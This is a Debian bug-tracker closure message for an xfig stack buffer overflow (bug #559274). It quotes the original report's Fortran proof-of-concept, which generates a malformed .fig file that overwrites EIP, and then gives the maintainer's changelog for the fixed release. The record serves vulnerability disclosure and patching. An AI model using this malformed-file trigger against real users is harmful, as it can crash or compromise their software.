Your message dated Sun, 06 Dec 2009 12:56:34 +0000
with message-id <e1nhgfc-0007xm...@ries.debian.org>
and subject line Bug#559274: fixed in xfig 1:3.2.5.b-1
has caused the Debian Bug report #559274,
regarding xfig: buffer overflow in read .fig file
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
559274: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=559274
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Subject: xfig: buffer overflow in read .fig file
Package: xfig
Version: 1:3.2.5-rel-3
Severity: grave
Justification: user security hole
Tags: security
xfig and fig2dev in transfig package will buffer overflow when read
.fig file. see poc file including. compile gfortran.
-- PEDAMACHEPHEPTOLIONES & D.B. COOPER
-- System Information:
Debian Release: 5.0.3
APT prefers stable
APT policy: (500, 'stable')
Architecture: i386 (i686)
Kernel: Linux 2.6.26-1-686-bigmem (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages xfig depends on:
ii libc6 2.7-18 GNU C Library: Shared libraries
ii libjpeg62 6b-14 The Independent JPEG Group's JPEG
ii libpng12-0 1.2.27-2+lenny2 PNG library - runtime
ii libx11-6 2:1.1.5-2 X11 client-side library
ii libxi6 2:1.1.4-1 X11 Input extension library
ii libxpm4 1:3.5.7-1 X11 pixmap library
ii libxt6 1:1.0.5-3 X11 toolkit intrinsics library
ii xaw3dg 1.5+E-17 Xaw3d widget set
Versions of packages xfig recommends:
ii transfig 1:3.2.5-rel-3.1 Utilities for converting XFig figu
ii xfig-libs 1:3.2.5-rel-3 XFig image libraries and examples
-- no debconf information
PROGRAM XFIG_POC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
C
C XFIG <= 3.2.5B BUFFER OVERFLOW
C TRANSFIG <= 3.2.5A (FIG2DEV SOFT) BUFFER OVERFLOW
C WWW.XFIG.ORG
C
C AUTHORS:
C * PEDAMACHEPHEPTOLIONES <pedamachepheptolio...@gmail.com>
C * D.B. COOPER
C
C PROBLEM:
C A STACK-BASED BUFFER OVERFLOW OCCURS IN read_1_3_textobject()
C WHEN READING MALFORMED .FIG FILES
C EIP IS OVERWRITTEN SO IT'S NOT JUST A CRASH
C
C TEST:
C xfig plane.fig
C fig2dev -L png plane.fig
C (IT DOESN'T HAVE TO BE "PNG")
C
C SOLUTION:
C DON'T TAKE .FIG CANDY FROM STRANGERS
C
C OLDSKOOL FORTRAN POCS FTW
C
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
INTEGER I
CHARACTER(LEN=167) :: STR
DO 10 I=1,167
STR(I:I)='Z'
10 CONTINUE
OPEN(11,FILE='plane.fig')
WRITE(11,*) '0 1 2 3'
WRITE(11,*) '4'
WRITE(11,*) '1 2 3 4 5 6 7 '//STR
CLOSE(11)
WRITE(*,*) 'GREETZ: BACKUS AND BACCHUS'
END PROGRAM XFIG_POC
--- End Message ---
--- Begin Message ---
Source: xfig
Source-Version: 1:3.2.5.b-1
We believe that the bug you reported is fixed in the latest version of
xfig, which is due to be installed in the Debian FTP archive:
xfig-doc_3.2.5.b-1_all.deb
to main/x/xfig/xfig-doc_3.2.5.b-1_all.deb
xfig-libs_3.2.5.b-1_all.deb
to main/x/xfig/xfig-libs_3.2.5.b-1_all.deb
xfig_3.2.5.b-1.diff.gz
to main/x/xfig/xfig_3.2.5.b-1.diff.gz
xfig_3.2.5.b-1.dsc
to main/x/xfig/xfig_3.2.5.b-1.dsc
xfig_3.2.5.b-1_amd64.deb
to main/x/xfig/xfig_3.2.5.b-1_amd64.deb
xfig_3.2.5.b.orig.tar.gz
to main/x/xfig/xfig_3.2.5.b.orig.tar.gz
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 559...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Roland Rosenfeld <rol...@debian.org> (supplier of updated xfig package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160
Format: 1.8
Date: Sun, 06 Dec 2009 12:56:18 +0100
Source: xfig
Binary: xfig xfig-doc xfig-libs
Architecture: source all amd64
Version: 1:3.2.5.b-1
Distribution: unstable
Urgency: low
Maintainer: Roland Rosenfeld <rol...@debian.org>
Changed-By: Roland Rosenfeld <rol...@debian.org>
Description:
xfig - Facility for Interactive Generation of figures under X11
xfig-doc - XFig on-line documentation and examples
xfig-libs - XFig image libraries and examples
Closes: 530898 535181 556705 559274
Changes:
xfig (1:3.2.5.b-1) unstable; urgency=low
.
* New upstream version 3.2.5b.
* Remove patches that are incorporated upstream: 25_mkstemp,
26_missingprotos, 27_zoom-crash, 28_text-size-input, 29_print_segfault.
* 30_figparserstack: Fix Stack-based buffer overflow by loading
malformed .FIG files
(https://bugzilla.redhat.com/show_bug.cgi?id=543905) (Closes: #559274).
* Upgrade to Standards-Version 3.8.3 (no changes).
* Added debian/README.source (from dpatch package) to explain how dpatch
works.
* Remove path from update-xaw-wrappers script in preinst.
* 31_spelling: Fix spelling errors in binary.
* 13_remove_extra_libs: s/XTOOLONLYLIIB/XTOOLONLYLIB/, so Xt is linked
into the binary to make binutils-gold happy (Closes: #556705).
* 32_papersize_b1: xfig -papersize b1 now really uses B1 instead of B10
(Closes: #535181).
* 33_pdfimport_mediabox: Fix reading "/MediaBox" when importing PDF.
Thanks t jso...@univ-lille2.fr for providing a patch (Closes: #530898).
* 34_old_shadows: Restore old shadow behavior. Reduce shadow width to 1
pixel and fix a green scrollbar shadow.
Checksums-Sha1:
7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc
e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz
d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz
ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb
7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb
b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb
Checksums-Sha256:
e9af271607a1c360015dfd05cf3190fdd5c43c325fae6da47ba381e84d5148ff 1157
xfig_3.2.5.b-1.dsc
ab13d0f37b6f126c16df2026c61970bc9902b9b1c9f410e47beeb0caa95b1b4c 5770796
xfig_3.2.5.b.orig.tar.gz
7d59444e3cbd464f580ed2c3c19c02ab07579a434323a875b5e61817aa9d9379 46856
xfig_3.2.5.b-1.diff.gz
a3e4c685422fcb86213edcc902a2499ec1ca32db3c9ff130ffad70e40d0e6a9f 3363512
xfig-doc_3.2.5.b-1_all.deb
22727b249bc5d31e06b5ebda1c0be136f6bf5b75e5328b26031b0a7eec59e8ba 1677778
xfig-libs_3.2.5.b-1_all.deb
ad25d867fbb3f50a9b892a5a08d24bbb8971db10a2c46402960776e76db4a69d 739228
xfig_3.2.5.b-1_amd64.deb
Files:
e7bf421ba20d4101502268b9e280113a 1157 graphics optional xfig_3.2.5.b-1.dsc
d466efd7a293df39262a6ee0083f3197 5770796 graphics optional
xfig_3.2.5.b.orig.tar.gz
724c61b921e376a4c47218256f63b641 46856 graphics optional xfig_3.2.5.b-1.diff.gz
b114f5d3b164a89881a8741748eee4e9 3363512 doc optional
xfig-doc_3.2.5.b-1_all.deb
ef66b652d198fc9132c7c874dd30ee81 1677778 graphics optional
xfig-libs_3.2.5.b-1_all.deb
22a9f1d69a890cc8149c3d3d6c888775 739228 graphics optional
xfig_3.2.5.b-1_amd64.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEAREDAAYFAksbokYACgkQO7/Pd72LBQ0R8gCfd6QlPCJx1iT5adVG6TdLwhLL
dHkAn1LZnMglAsDvW4ibBYSpyRoa2Mu9
=Z9cv
-----END PGP SIGNATURE-----
--- End Message ---
